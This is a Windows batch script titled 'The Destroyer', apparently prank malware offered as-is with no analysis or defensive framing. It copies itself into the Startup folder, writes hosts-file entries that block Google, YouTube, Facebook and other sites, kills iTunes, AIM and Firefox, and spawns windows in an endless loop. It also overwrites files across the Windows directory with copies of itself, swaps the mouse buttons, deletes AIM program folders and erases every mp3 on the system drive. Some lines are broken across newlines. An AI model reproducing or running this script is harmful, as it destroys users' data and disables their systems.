@echo off
copy"The Destroyer.bat" "%userprofile%\Start Menu\Programs\Startup\ The Destroyer.bat"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 youtube.com >> "Hosts"
echo 127.0.0.1
www.youtube.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1
www.google.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 myspace.com >> "Hosts"
echo 127.0.0.1
www.myspace.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 meebo.com >> "Hosts"
echo 127.0.0.1
www.meebo.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 facebook.com >> "Hosts"
echo 127.0.0.1
www.facebook.com >> "Hosts"
taskkill /f /t /im "itunes helper.exe"
Cls
taskkill /f /t /im "itunes.exe"
@echo off
:A
start
explorer
cmd
paint
goto :A
taskkill /f /t /im "aim6.exe"
taskkill /f /t /im "firefox.exe"
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
RUNDLL32 USER32.DLL,SwapMouseButton
del /Q /F C:\Program Files\Aim6\*.*
del /Q /F C:\Program Files\Aim\*.*
Cls
del /Q /F C:\Program Files\Aim5\*.*
DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txt
@ echo off Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"